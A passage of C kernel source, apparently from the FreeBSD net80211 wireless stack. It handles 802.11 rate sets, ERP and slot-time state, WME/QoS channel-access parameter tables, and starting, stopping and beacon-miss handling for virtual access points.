unacceptable rates. */ nrs->rs_nrates--; for (j = i; j < nrs->rs_nrates; j++) nrs->rs_rates[j] = nrs->rs_rates[j + 1]; nrs->rs_rates[j] = 0; continue; } if (rix >= 0) okrate = nrs->rs_rates[i]; i++; } if (okrate == 0 || error != 0 || ((flags & (IEEE80211_F_DOFRATE|IEEE80211_F_DOFMCS)) && fixedrate != ucastrate)) { IEEE80211_NOTE(vap, IEEE80211_MSG_XRATE | IEEE80211_MSG_11N, ni, "%s: flags 0x%x okrate %d error %d fixedrate 0x%x " "ucastrate %x\n", __func__, fixedrate, ucastrate, flags); return badrate | IEEE80211_RATE_BASIC; } else return RV(okrate); #undef RV } /* * Reset 11g-related state. */ void ieee80211_reset_erp(struct ieee80211com *ic) { ic->ic_flags &= ~IEEE80211_F_USEPROT; ic->ic_nonerpsta = 0; ic->ic_longslotsta = 0; /* * Short slot time is enabled only when operating in 11g * and not in an IBSS. We must also honor whether or not * the driver is capable of doing it. */ ieee80211_set_shortslottime(ic, IEEE80211_IS_CHAN_A(ic->ic_curchan) || IEEE80211_IS_CHAN_HT(ic->ic_curchan) || (IEEE80211_IS_CHAN_ANYG(ic->ic_curchan) && ic->ic_opmode == IEEE80211_M_HOSTAP && (ic->ic_caps & IEEE80211_C_SHSLOT))); /* * Set short preamble and ERP barker-preamble flags. */ if (IEEE80211_IS_CHAN_A(ic->ic_curchan) || (ic->ic_caps & IEEE80211_C_SHPREAMBLE)) { ic->ic_flags |= IEEE80211_F_SHPREAMBLE; ic->ic_flags &= ~IEEE80211_F_USEBARKER; } else { ic->ic_flags &= ~IEEE80211_F_SHPREAMBLE; ic->ic_flags |= IEEE80211_F_USEBARKER; } } /* * Set the short slot time state and notify the driver. */ void ieee80211_set_shortslottime(struct ieee80211com *ic, int onoff) { if (onoff) ic->ic_flags |= IEEE80211_F_SHSLOT; else ic->ic_flags &= ~IEEE80211_F_SHSLOT; /* notify driver */ if (ic->ic_updateslot != NULL) ic->ic_updateslot(ic->ic_ifp); } /* * Check if the specified rate set supports ERP. * NB: the rate set is assumed to be sorted. */ int ieee80211_iserp_rateset(const struct ieee80211_rateset *rs) { static const int rates[] = { 2, 4, 11, 22, 12, 24, 48 }; int i, j; if (rs->rs_nrates < nitems(rates)) return 0; for (i = 0; i < nitems(rates); i++) { for (j = 0; j < rs->rs_nrates; j++) { int r = rs->rs_rates[j] & IEEE80211_RATE_VAL; if (rates[i] == r) goto next; if (r > rates[i]) return 0; } return 0; next: ; } return 1; } /* * Mark the basic rates for the rate table based on the * operating mode. For real 11g we mark all the 11b rates * and 6, 12, and 24 OFDM. For 11b compatibility we mark only * 11b rates. There's also a pseudo 11a-mode used to mark only * the basic OFDM rates. */ static void setbasicrates(struct ieee80211_rateset *rs, enum ieee80211_phymode mode, int add) { static const struct ieee80211_rateset basic[IEEE80211_MODE_MAX] = { [IEEE80211_MODE_11A] = { 3, { 12, 24, 48 } }, [IEEE80211_MODE_11B] = { 2, { 2, 4 } }, /* NB: mixed b/g */ [IEEE80211_MODE_11G] = { 4, { 2, 4, 11, 22 } }, [IEEE80211_MODE_TURBO_A] = { 3, { 12, 24, 48 } }, [IEEE80211_MODE_TURBO_G] = { 4, { 2, 4, 11, 22 } }, [IEEE80211_MODE_STURBO_A] = { 3, { 12, 24, 48 } }, [IEEE80211_MODE_HALF] = { 3, { 6, 12, 24 } }, [IEEE80211_MODE_QUARTER] = { 3, { 3, 6, 12 } }, [IEEE80211_MODE_11NA] = { 3, { 12, 24, 48 } }, /* NB: mixed b/g */ [IEEE80211_MODE_11NG] = { 4, { 2, 4, 11, 22 } }, }; int i, j; for (i = 0; i < rs->rs_nrates; i++) { if (!add) rs->rs_rates[i] &= IEEE80211_RATE_VAL; for (j = 0; j < basic[mode].rs_nrates; j++) if (basic[mode].rs_rates[j] == rs->rs_rates[i]) { rs->rs_rates[i] |= IEEE80211_RATE_BASIC; break; } } } /* * Set the basic rates in a rate set. */ void ieee80211_setbasicrates(struct ieee80211_rateset *rs, enum ieee80211_phymode mode) { setbasicrates(rs, mode, 0); } /* * Add basic rates to a rate set. */ void ieee80211_addbasicrates(struct ieee80211_rateset *rs, enum ieee80211_phymode mode) { setbasicrates(rs, mode, 1); } /* * WME protocol support. * * The default 11a/b/g/n parameters come from the WiFi Alliance WMM * System Interopability Test Plan (v1.4, Appendix F) and the 802.11n * Draft 2.0 Test Plan (Appendix D). * * Static/Dynamic Turbo mode settings come from Atheros. */ typedef struct phyParamType { uint8_t aifsn; uint8_t logcwmin; uint8_t logcwmax; uint16_t txopLimit; uint8_t acm; } paramType; static const struct phyParamType phyParamForAC_BE[IEEE80211_MODE_MAX] = { [IEEE80211_MODE_AUTO] = { 3, 4, 6, 0, 0 }, [IEEE80211_MODE_11A] = { 3, 4, 6, 0, 0 }, [IEEE80211_MODE_11B] = { 3, 4, 6, 0, 0 }, [IEEE80211_MODE_11G] = { 3, 4, 6, 0, 0 }, [IEEE80211_MODE_FH] = { 3, 4, 6, 0, 0 }, [IEEE80211_MODE_TURBO_A]= { 2, 3, 5, 0, 0 }, [IEEE80211_MODE_TURBO_G]= { 2, 3, 5, 0, 0 }, [IEEE80211_MODE_STURBO_A]={ 2, 3, 5, 0, 0 }, [IEEE80211_MODE_HALF] = { 3, 4, 6, 0, 0 }, [IEEE80211_MODE_QUARTER]= { 3, 4, 6, 0, 0 }, [IEEE80211_MODE_11NA] = { 3, 4, 6, 0, 0 }, [IEEE80211_MODE_11NG] = { 3, 4, 6, 0, 0 }, }; static const struct phyParamType phyParamForAC_BK[IEEE80211_MODE_MAX] = { [IEEE80211_MODE_AUTO] = { 7, 4, 10, 0, 0 }, [IEEE80211_MODE_11A] = { 7, 4, 10, 0, 0 }, [IEEE80211_MODE_11B] = { 7, 4, 10, 0, 0 }, [IEEE80211_MODE_11G] = { 7, 4, 10, 0, 0 }, [IEEE80211_MODE_FH] = { 7, 4, 10, 0, 0 }, [IEEE80211_MODE_TURBO_A]= { 7, 3, 10, 0, 0 }, [IEEE80211_MODE_TURBO_G]= { 7, 3, 10, 0, 0 }, [IEEE80211_MODE_STURBO_A]={ 7, 3, 10, 0, 0 }, [IEEE80211_MODE_HALF] = { 7, 4, 10, 0, 0 }, [IEEE80211_MODE_QUARTER]= { 7, 4, 10, 0, 0 }, [IEEE80211_MODE_11NA] = { 7, 4, 10, 0, 0 }, [IEEE80211_MODE_11NG] = { 7, 4, 10, 0, 0 }, }; static const struct phyParamType phyParamForAC_VI[IEEE80211_MODE_MAX] = { [IEEE80211_MODE_AUTO] = { 1, 3, 4, 94, 0 }, [IEEE80211_MODE_11A] = { 1, 3, 4, 94, 0 }, [IEEE80211_MODE_11B] = { 1, 3, 4, 188, 0 }, [IEEE80211_MODE_11G] = { 1, 3, 4, 94, 0 }, [IEEE80211_MODE_FH] = { 1, 3, 4, 188, 0 }, [IEEE80211_MODE_TURBO_A]= { 1, 2, 3, 94, 0 }, [IEEE80211_MODE_TURBO_G]= { 1, 2, 3, 94, 0 }, [IEEE80211_MODE_STURBO_A]={ 1, 2, 3, 94, 0 }, [IEEE80211_MODE_HALF] = { 1, 3, 4, 94, 0 }, [IEEE80211_MODE_QUARTER]= { 1, 3, 4, 94, 0 }, [IEEE80211_MODE_11NA] = { 1, 3, 4, 94, 0 }, [IEEE80211_MODE_11NG] = { 1, 3, 4, 94, 0 }, }; static const struct phyParamType phyParamForAC_VO[IEEE80211_MODE_MAX] = { [IEEE80211_MODE_AUTO] = { 1, 2, 3, 47, 0 }, [IEEE80211_MODE_11A] = { 1, 2, 3, 47, 0 }, [IEEE80211_MODE_11B] = { 1, 2, 3, 102, 0 }, [IEEE80211_MODE_11G] = { 1, 2, 3, 47, 0 }, [IEEE80211_MODE_FH] = { 1, 2, 3, 102, 0 }, [IEEE80211_MODE_TURBO_A]= { 1, 2, 2, 47, 0 }, [IEEE80211_MODE_TURBO_G]= { 1, 2, 2, 47, 0 }, [IEEE80211_MODE_STURBO_A]={ 1, 2, 2, 47, 0 }, [IEEE80211_MODE_HALF] = { 1, 2, 3, 47, 0 }, [IEEE80211_MODE_QUARTER]= { 1, 2, 3, 47, 0 }, [IEEE80211_MODE_11NA] = { 1, 2, 3, 47, 0 }, [IEEE80211_MODE_11NG] = { 1, 2, 3, 47, 0 }, }; static const struct phyParamType bssPhyParamForAC_BE[IEEE80211_MODE_MAX] = { [IEEE80211_MODE_AUTO] = { 3, 4, 10, 0, 0 }, [IEEE80211_MODE_11A] = { 3, 4, 10, 0, 0 }, [IEEE80211_MODE_11B] = { 3, 4, 10, 0, 0 }, [IEEE80211_MODE_11G] = { 3, 4, 10, 0, 0 }, [IEEE80211_MODE_FH] = { 3, 4, 10, 0, 0 }, [IEEE80211_MODE_TURBO_A]= { 2, 3, 10, 0, 0 }, [IEEE80211_MODE_TURBO_G]= { 2, 3, 10, 0, 0 }, [IEEE80211_MODE_STURBO_A]={ 2, 3, 10, 0, 0 }, [IEEE80211_MODE_HALF] = { 3, 4, 10, 0, 0 }, [IEEE80211_MODE_QUARTER]= { 3, 4, 10, 0, 0 }, [IEEE80211_MODE_11NA] = { 3, 4, 10, 0, 0 }, [IEEE80211_MODE_11NG] = { 3, 4, 10, 0, 0 }, }; static const struct phyParamType bssPhyParamForAC_VI[IEEE80211_MODE_MAX] = { [IEEE80211_MODE_AUTO] = { 2, 3, 4, 94, 0 }, [IEEE80211_MODE_11A] = { 2, 3, 4, 94, 0 }, [IEEE80211_MODE_11B] = { 2, 3, 4, 188, 0 }, [IEEE80211_MODE_11G] = { 2, 3, 4, 94, 0 }, [IEEE80211_MODE_FH] = { 2, 3, 4, 188, 0 }, [IEEE80211_MODE_TURBO_A]= { 2, 2, 3, 94, 0 }, [IEEE80211_MODE_TURBO_G]= { 2, 2, 3, 94, 0 }, [IEEE80211_MODE_STURBO_A]={ 2, 2, 3, 94, 0 }, [IEEE80211_MODE_HALF] = { 2, 3, 4, 94, 0 }, [IEEE80211_MODE_QUARTER]= { 2, 3, 4, 94, 0 }, [IEEE80211_MODE_11NA] = { 2, 3, 4, 94, 0 }, [IEEE80211_MODE_11NG] = { 2, 3, 4, 94, 0 }, }; static const struct phyParamType bssPhyParamForAC_VO[IEEE80211_MODE_MAX] = { [IEEE80211_MODE_AUTO] = { 2, 2, 3, 47, 0 }, [IEEE80211_MODE_11A] = { 2, 2, 3, 47, 0 }, [IEEE80211_MODE_11B] = { 2, 2, 3, 102, 0 }, [IEEE80211_MODE_11G] = { 2, 2, 3, 47, 0 }, [IEEE80211_MODE_FH] = { 2, 2, 3, 102, 0 }, [IEEE80211_MODE_TURBO_A]= { 1, 2, 2, 47, 0 }, [IEEE80211_MODE_TURBO_G]= { 1, 2, 2, 47, 0 }, [IEEE80211_MODE_STURBO_A]={ 1, 2, 2, 47, 0 }, [IEEE80211_MODE_HALF] = { 2, 2, 3, 47, 0 }, [IEEE80211_MODE_QUARTER]= { 2, 2, 3, 47, 0 }, [IEEE80211_MODE_11NA] = { 2, 2, 3, 47, 0 }, [IEEE80211_MODE_11NG] = { 2, 2, 3, 47, 0 }, }; static void _setifsparams(struct wmeParams *wmep, const paramType *phy) { wmep->wmep_aifsn = phy->aifsn; wmep->wmep_logcwmin = phy->logcwmin; wmep->wmep_logcwmax = phy->logcwmax; wmep->wmep_txopLimit = phy->txopLimit; } static void setwmeparams(struct ieee80211vap *vap, const char *type, int ac, struct wmeParams *wmep, const paramType *phy) { wmep->wmep_acm = phy->acm; _setifsparams(wmep, phy); IEEE80211_DPRINTF(vap, IEEE80211_MSG_WME, "set %s (%s) [acm %u aifsn %u logcwmin %u logcwmax %u txop %u]\n", ieee80211_wme_acnames[ac], type, wmep->wmep_acm, wmep->wmep_aifsn, wmep->wmep_logcwmin, wmep->wmep_logcwmax, wmep->wmep_txopLimit); } static void ieee80211_wme_initparams_locked(struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_wme_state *wme = &ic->ic_wme; const paramType *pPhyParam, *pBssPhyParam; struct wmeParams *wmep; enum ieee80211_phymode mode; int i; IEEE80211_LOCK_ASSERT(ic); if ((ic->ic_caps & IEEE80211_C_WME) == 0 || ic->ic_nrunning > 1) return; /* * Clear the wme cap_info field so a qoscount from a previous * vap doesn't confuse later code which only parses the beacon * field and updates hardware when said field changes. * Otherwise the hardware is programmed with defaults, not what * the beacon actually announces. */ wme->wme_wmeChanParams.cap_info = 0; /* * Select mode; we can be called early in which case we * always use auto mode. We know we'll be called when * entering the RUN state with bsschan setup properly * so state will eventually get set correctly */ if (ic->ic_bsschan != IEEE80211_CHAN_ANYC) mode = ieee80211_chan2mode(ic->ic_bsschan); else mode = IEEE80211_MODE_AUTO; for (i = 0; i < WME_NUM_AC; i++) { switch (i) { case WME_AC_BK: pPhyParam = &phyParamForAC_BK[mode]; pBssPhyParam = &phyParamForAC_BK[mode]; break; case WME_AC_VI: pPhyParam = &phyParamForAC_VI[mode]; pBssPhyParam = &bssPhyParamForAC_VI[mode]; break; case WME_AC_VO: pPhyParam = &phyParamForAC_VO[mode]; pBssPhyParam = &bssPhyParamForAC_VO[mode]; break; case WME_AC_BE: default: pPhyParam = &phyParamForAC_BE[mode]; pBssPhyParam = &bssPhyParamForAC_BE[mode]; break; } wmep = &wme->wme_wmeChanParams.cap_wmeParams[i]; if (ic->ic_opmode == IEEE80211_M_HOSTAP) { setwmeparams(vap, "chan", i, wmep, pPhyParam); } else { setwmeparams(vap, "chan", i, wmep, pBssPhyParam); } wmep = &wme->wme_wmeBssChanParams.cap_wmeParams[i]; setwmeparams(vap, "bss ", i, wmep, pBssPhyParam); } /* NB: check ic_bss to avoid NULL deref on initial attach */ if (vap->iv_bss != NULL) { /* * Calculate agressive mode switching threshold based * on beacon interval. This doesn't need locking since * we're only called before entering the RUN state at * which point we start sending beacon frames. */ wme->wme_hipri_switch_thresh = (HIGH_PRI_SWITCH_THRESH * vap->iv_bss->ni_intval) / 100; wme->wme_flags &= ~WME_F_AGGRMODE; ieee80211_wme_updateparams(vap); } } void ieee80211_wme_initparams(struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; IEEE80211_LOCK(ic); ieee80211_wme_initparams_locked(vap); IEEE80211_UNLOCK(ic); } /* * Update WME parameters for ourself and the BSS. */ void ieee80211_wme_updateparams_locked(struct ieee80211vap *vap) { static const paramType aggrParam[IEEE80211_MODE_MAX] = { [IEEE80211_MODE_AUTO] = { 2, 4, 10, 64, 0 }, [IEEE80211_MODE_11A] = { 2, 4, 10, 64, 0 }, [IEEE80211_MODE_11B] = { 2, 5, 10, 64, 0 }, [IEEE80211_MODE_11G] = { 2, 4, 10, 64, 0 }, [IEEE80211_MODE_FH] = { 2, 5, 10, 64, 0 }, [IEEE80211_MODE_TURBO_A] = { 1, 3, 10, 64, 0 }, [IEEE80211_MODE_TURBO_G] = { 1, 3, 10, 64, 0 }, [IEEE80211_MODE_STURBO_A] = { 1, 3, 10, 64, 0 }, [IEEE80211_MODE_HALF] = { 2, 4, 10, 64, 0 }, [IEEE80211_MODE_QUARTER] = { 2, 4, 10, 64, 0 }, [IEEE80211_MODE_11NA] = { 2, 4, 10, 64, 0 }, /* XXXcheck*/ [IEEE80211_MODE_11NG] = { 2, 4, 10, 64, 0 }, /* XXXcheck*/ }; struct ieee80211com *ic = vap->iv_ic; struct ieee80211_wme_state *wme = &ic->ic_wme; const struct wmeParams *wmep; struct wmeParams *chanp, *bssp; enum ieee80211_phymode mode; int i; int do_aggrmode = 0; /* * Set up the channel access parameters for the physical * device. First populate the configured settings. */ for (i = 0; i < WME_NUM_AC; i++) { chanp = &wme->wme_chanParams.cap_wmeParams[i]; wmep = &wme->wme_wmeChanParams.cap_wmeParams[i]; chanp->wmep_aifsn = wmep->wmep_aifsn; chanp->wmep_logcwmin = wmep->wmep_logcwmin; chanp->wmep_logcwmax = wmep->wmep_logcwmax; chanp->wmep_txopLimit = wmep->wmep_txopLimit; chanp = &wme->wme_bssChanParams.cap_wmeParams[i]; wmep = &wme->wme_wmeBssChanParams.cap_wmeParams[i]; chanp->wmep_aifsn = wmep->wmep_aifsn; chanp->wmep_logcwmin = wmep->wmep_logcwmin; chanp->wmep_logcwmax = wmep->wmep_logcwmax; chanp->wmep_txopLimit = wmep->wmep_txopLimit; } /* * Select mode; we can be called early in which case we * always use auto mode. We know we'll be called when * entering the RUN state with bsschan setup properly * so state will eventually get set correctly */ if (ic->ic_bsschan != IEEE80211_CHAN_ANYC) mode = ieee80211_chan2mode(ic->ic_bsschan); else mode = IEEE80211_MODE_AUTO; /* * This implements agressive mode as found in certain * vendors' AP's. When there is significant high * priority (VI/VO) traffic in the BSS throttle back BE * traffic by using conservative parameters. Otherwise * BE uses agressive params to optimize performance of * legacy/non-QoS traffic. */ /* Hostap? Only if aggressive mode is enabled */ if (vap->iv_opmode == IEEE80211_M_HOSTAP && (wme->wme_flags & WME_F_AGGRMODE) != 0) do_aggrmode = 1; /* * Station? Only if we're in a non-QoS BSS. */ else if ((vap->iv_opmode == IEEE80211_M_STA && (vap->iv_bss->ni_flags & IEEE80211_NODE_QOS) == 0)) do_aggrmode = 1; /* * IBSS? Only if we we have WME enabled. */ else if ((vap->iv_opmode == IEEE80211_M_IBSS) && (vap->iv_flags & IEEE80211_F_WME)) do_aggrmode = 1; /* * If WME is disabled on this VAP, default to aggressive mode * regardless of the configuration. */ if ((vap->iv_flags & IEEE80211_F_WME) == 0) do_aggrmode = 1; /* XXX WDS? */ /* XXX MBSS? */ if (do_aggrmode) { chanp = &wme->wme_chanParams.cap_wmeParams[WME_AC_BE]; bssp = &wme->wme_bssChanParams.cap_wmeParams[WME_AC_BE]; chanp->wmep_aifsn = bssp->wmep_aifsn = aggrParam[mode].aifsn; chanp->wmep_logcwmin = bssp->wmep_logcwmin = aggrParam[mode].logcwmin; chanp->wmep_logcwmax = bssp->wmep_logcwmax = aggrParam[mode].logcwmax; chanp->wmep_txopLimit = bssp->wmep_txopLimit = (vap->iv_flags & IEEE80211_F_BURST) ? aggrParam[mode].txopLimit : 0; IEEE80211_DPRINTF(vap, IEEE80211_MSG_WME, "update %s (chan+bss) [acm %u aifsn %u logcwmin %u " "logcwmax %u txop %u]\n", ieee80211_wme_acnames[WME_AC_BE], chanp->wmep_acm, chanp->wmep_aifsn, chanp->wmep_logcwmin, chanp->wmep_logcwmax, chanp->wmep_txopLimit); } /* * Change the contention window based on the number of associated * stations. If the number of associated stations is 1 and * aggressive mode is enabled, lower the contention window even * further. */ if (vap->iv_opmode == IEEE80211_M_HOSTAP && ic->ic_sta_assoc < 2 && (wme->wme_flags & WME_F_AGGRMODE) != 0) { static const uint8_t logCwMin[IEEE80211_MODE_MAX] = { [IEEE80211_MODE_AUTO] = 3, [IEEE80211_MODE_11A] = 3, [IEEE80211_MODE_11B] = 4, [IEEE80211_MODE_11G] = 3, [IEEE80211_MODE_FH] = 4, [IEEE80211_MODE_TURBO_A] = 3, [IEEE80211_MODE_TURBO_G] = 3, [IEEE80211_MODE_STURBO_A] = 3, [IEEE80211_MODE_HALF] = 3, [IEEE80211_MODE_QUARTER] = 3, [IEEE80211_MODE_11NA] = 3, [IEEE80211_MODE_11NG] = 3, }; chanp = &wme->wme_chanParams.cap_wmeParams[WME_AC_BE]; bssp = &wme->wme_bssChanParams.cap_wmeParams[WME_AC_BE]; chanp->wmep_logcwmin = bssp->wmep_logcwmin = logCwMin[mode]; IEEE80211_DPRINTF(vap, IEEE80211_MSG_WME, "update %s (chan+bss) logcwmin %u\n", ieee80211_wme_acnames[WME_AC_BE], chanp->wmep_logcwmin); } /* * Arrange for the beacon update. * * XXX what about MBSS, WDS? */ if (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_IBSS) { /* * Arrange for a beacon update and bump the parameter * set number so associated stations load the new values. */ wme->wme_bssChanParams.cap_info = (wme->wme_bssChanParams.cap_info+1) & WME_QOSINFO_COUNT; ieee80211_beacon_notify(vap, IEEE80211_BEACON_WME); } wme->wme_update(ic); IEEE80211_DPRINTF(vap, IEEE80211_MSG_WME, "%s: WME params updated, cap_info 0x%x\n", __func__, vap->iv_opmode == IEEE80211_M_STA ? wme->wme_wmeChanParams.cap_info : wme->wme_bssChanParams.cap_info); } void ieee80211_wme_updateparams(struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; if (ic->ic_caps & IEEE80211_C_WME) { IEEE80211_LOCK(ic); ieee80211_wme_updateparams_locked(vap); IEEE80211_UNLOCK(ic); } } static void parent_updown(void *arg, int npending) { struct ifnet *parent = arg; parent->if_ioctl(parent, SIOCSIFFLAGS, NULL); } static void update_mcast(void *arg, int npending) { struct ieee80211com *ic = arg; struct ifnet *parent = ic->ic_ifp; ic->ic_update_mcast(parent); } static void update_promisc(void *arg, int npending) { struct ieee80211com *ic = arg; struct ifnet *parent = ic->ic_ifp; ic->ic_update_promisc(parent); } static void update_channel(void *arg, int npending) { struct ieee80211com *ic = arg; ic->ic_set_channel(ic); ieee80211_radiotap_chan_change(ic); } static void update_chw(void *arg, int npending) { struct ieee80211com *ic = arg; /* * XXX should we defer the channel width _config_ update until now? */ ic->ic_update_chw(ic); } /* * Block until the parent is in a known state. This is * used after any operations that dispatch a task (e.g. * to auto-configure the parent device up/down). */ void ieee80211_waitfor_parent(struct ieee80211com *ic) { taskqueue_block(ic->ic_tq); ieee80211_draintask(ic, &ic->ic_parent_task); ieee80211_draintask(ic, &ic->ic_mcast_task); ieee80211_draintask(ic, &ic->ic_promisc_task); ieee80211_draintask(ic, &ic->ic_chan_task); ieee80211_draintask(ic, &ic->ic_bmiss_task); ieee80211_draintask(ic, &ic->ic_chw_task); taskqueue_unblock(ic->ic_tq); } /* * Start a vap running. If this is the first vap to be * set running on the underlying device then we * automatically bring the device up. */ void ieee80211_start_locked(struct ieee80211vap *vap) { struct ifnet *ifp = vap->iv_ifp; struct ieee80211com *ic = vap->iv_ic; struct ifnet *parent = ic->ic_ifp; IEEE80211_LOCK_ASSERT(ic); IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE | IEEE80211_MSG_DEBUG, "start running, %d vaps running\n", ic->ic_nrunning); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { /* * Mark us running. Note that it's ok to do this first; * if we need to bring the parent device up we defer that * to avoid dropping the com lock. We expect the device * to respond to being marked up by calling back into us * through ieee80211_start_all at which point we'll come * back in here and complete the work. */ ifp->if_drv_flags |= IFF_DRV_RUNNING; /* * We are not running; if this we are the first vap * to be brought up auto-up the parent if necessary. */ if (ic->ic_nrunning++ == 0 && (parent->if_drv_flags & IFF_DRV_RUNNING) == 0) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE | IEEE80211_MSG_DEBUG, "%s: up parent %s\n", __func__, parent->if_xname); parent->if_flags |= IFF_UP; ieee80211_runtask(ic, &ic->ic_parent_task); return; } } /* * If the parent is up and running, then kick the * 802.11 state machine as appropriate. */ if ((parent->if_drv_flags & IFF_DRV_RUNNING) && vap->iv_roaming != IEEE80211_ROAMING_MANUAL) { if (vap->iv_opmode == IEEE80211_M_STA) { #if 0 /* XXX bypasses scan too easily; disable for now */ /* * Try to be intelligent about clocking the state * machine. If we're currently in RUN state then * we should be able to apply any new state/parameters * simply by re-associating. Otherwise we need to * re-scan to select an appropriate ap. */ if (vap->iv_state >= IEEE80211_S_RUN) ieee80211_new_state_locked(vap, IEEE80211_S_ASSOC, 1); else #endif ieee80211_new_state_locked(vap, IEEE80211_S_SCAN, 0); } else { /* * For monitor+wds mode there's nothing to do but * start running. Otherwise if this is the first * vap to be brought up, start a scan which may be * preempted if the station is locked to a particular * channel. */ vap->iv_flags_ext |= IEEE80211_FEXT_REINIT; if (vap->iv_opmode == IEEE80211_M_MONITOR || vap->iv_opmode == IEEE80211_M_WDS) ieee80211_new_state_locked(vap, IEEE80211_S_RUN, -1); else ieee80211_new_state_locked(vap, IEEE80211_S_SCAN, 0); } } } /* * Start a single vap. */ void ieee80211_init(void *arg) { struct ieee80211vap *vap = arg; IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE | IEEE80211_MSG_DEBUG, "%s\n", __func__); IEEE80211_LOCK(vap->iv_ic); ieee80211_start_locked(vap); IEEE80211_UNLOCK(vap->iv_ic); } /* * Start all runnable vap's on a device. */ void ieee80211_start_all(struct ieee80211com *ic) { struct ieee80211vap *vap; IEEE80211_LOCK(ic); TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) { struct ifnet *ifp = vap->iv_ifp; if (IFNET_IS_UP_RUNNING(ifp)) /* NB: avoid recursion */ ieee80211_start_locked(vap); } IEEE80211_UNLOCK(ic); } /* * Stop a vap. We force it down using the state machine * then mark it's ifnet not running. If this is the last * vap running on the underlying device then we close it * too to insure it will be properly initialized when the * next vap is brought up. */ void ieee80211_stop_locked(struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = vap->iv_ifp; struct ifnet *parent = ic->ic_ifp; IEEE80211_LOCK_ASSERT(ic); IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE | IEEE80211_MSG_DEBUG, "stop running, %d vaps running\n", ic->ic_nrunning); ieee80211_new_state_locked(vap, IEEE80211_S_INIT, -1); if (ifp->if_drv_flags & IFF_DRV_RUNNING) { ifp->if_drv_flags &= ~IFF_DRV_RUNNING; /* mark us stopped */ if (--ic->ic_nrunning == 0 && (parent->if_drv_flags & IFF_DRV_RUNNING)) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE | IEEE80211_MSG_DEBUG, "down parent %s\n", parent->if_xname); parent->if_flags &= ~IFF_UP; ieee80211_runtask(ic, &ic->ic_parent_task); } } } void ieee80211_stop(struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; IEEE80211_LOCK(ic); ieee80211_stop_locked(vap); IEEE80211_UNLOCK(ic); } /* * Stop all vap's running on a device. */ void ieee80211_stop_all(struct ieee80211com *ic) { struct ieee80211vap *vap; IEEE80211_LOCK(ic); TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) { struct ifnet *ifp = vap->iv_ifp; if (IFNET_IS_UP_RUNNING(ifp)) /* NB: avoid recursion */ ieee80211_stop_locked(vap); } IEEE80211_UNLOCK(ic); ieee80211_waitfor_parent(ic); } /* * Stop all vap's running on a device and arrange * for those that were running to be resumed. */ void ieee80211_suspend_all(struct ieee80211com *ic) { struct ieee80211vap *vap; IEEE80211_LOCK(ic); TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) { struct ifnet *ifp = vap->iv_ifp; if (IFNET_IS_UP_RUNNING(ifp)) { /* NB: avoid recursion */ vap->iv_flags_ext |= IEEE80211_FEXT_RESUME; ieee80211_stop_locked(vap); } } IEEE80211_UNLOCK(ic); ieee80211_waitfor_parent(ic); } /* * Start all vap's marked for resume. */ void ieee80211_resume_all(struct ieee80211com *ic) { struct ieee80211vap *vap; IEEE80211_LOCK(ic); TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) { struct ifnet *ifp = vap->iv_ifp; if (!IFNET_IS_UP_RUNNING(ifp) && (vap->iv_flags_ext & IEEE80211_FEXT_RESUME)) { vap->iv_flags_ext &= ~IEEE80211_FEXT_RESUME; ieee80211_start_locked(vap); } } IEEE80211_UNLOCK(ic); } void ieee80211_beacon_miss(struct ieee80211com *ic) { IEEE80211_LOCK(ic); if ((ic->ic_flags & IEEE80211_F_SCAN) == 0) { /* Process in a taskq, the handler may reenter the driver */ ieee80211_runtask(ic, &ic->ic_bmiss_task); } IEEE80211_UNLOCK(ic); } static void beacon_miss(void *arg, int npending) { struct ieee80211com *ic = arg; struct ieee80211vap *vap; IEEE80211_LOCK(ic); TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) { /* * We only pass events through for sta vap's in RUN state; * may be too restrictive but for now this saves all the * handlers duplicating these checks. */ if (vap->iv_opmode == IEEE80211_M_STA && vap->iv_state >= IEEE80211_S_RUN && vap->iv_bmiss != NULL) vap->iv_bmiss(vap); } IEEE80211_UNLOCK(ic); } static void beacon_swmiss(void *arg, int npending) { struct ieee80211vap *vap = arg; struct ieee80211com *ic = vap->iv_ic; IEEE80211_LOCK(ic); if (vap->iv_state == IEEE80211_S_RUN) { /* XXX Call multiple times if npending > zero? */ vap->iv_bmiss(vap); } IEEE80211_UNLOCK(ic); } /* * Software beacon miss handling. Check if any beacons * were received in the last period. If not post a * beacon miss; otherwise reset the counter. */ void ieee80211_swbmiss(void *arg) { struct ieee80211vap *vap = arg; struct ieee80211com *ic = vap->iv_ic; IEEE80211_LOCK_ASSERT(ic); /* XXX sleep state? */ KASSERT(vap->iv_state == IEEE80211_S_RUN, ("wrong state %d", vap->iv_state)); if (ic->ic_flags & IEEE80211_F_SCAN) { /* * If scanning just ignore and reset state. If we get a * bmiss after coming out of scan because we haven't had * time to receive a beacon then we should probe the AP * before posting a real bmiss (unless iv_bmiss_max has * been artifiically lowered). A cleaner solution might * be to disable the timer on scan start/end but to handle * case of multiple sta vap's we'd need to disable the * timers of all affected vap's. */ vap->iv_swbmiss_count = 0; } else if (vap->iv_swbmiss_count == 0) { if (vap->iv_bmiss != NULL) ieee80211_runtask(ic, &vap->iv_swbmiss_task); } else vap->iv_swbmiss_count = 0; callout_reset(&vap->iv_swbmiss, vap->iv_swbmiss_period, ieee80211_swbmiss, vap); } /* * Start an 802.11h channel switch. We record the parameters, * mark the operation pending, notify each vap through the * beacon update mechanism so it can update the beacon frame * contents, and then switch vap's to CSA state to block outbound * traffic. Devices that handle CSA directly can use the state * switch to do the right thing so long as they call * ieee80211_csa_completeswitch when it's time to complete the * channel change. Devices that depend on the net80211 layer can * use ieee80211_beacon_update to handle the countdown and the * channel switch. */ void 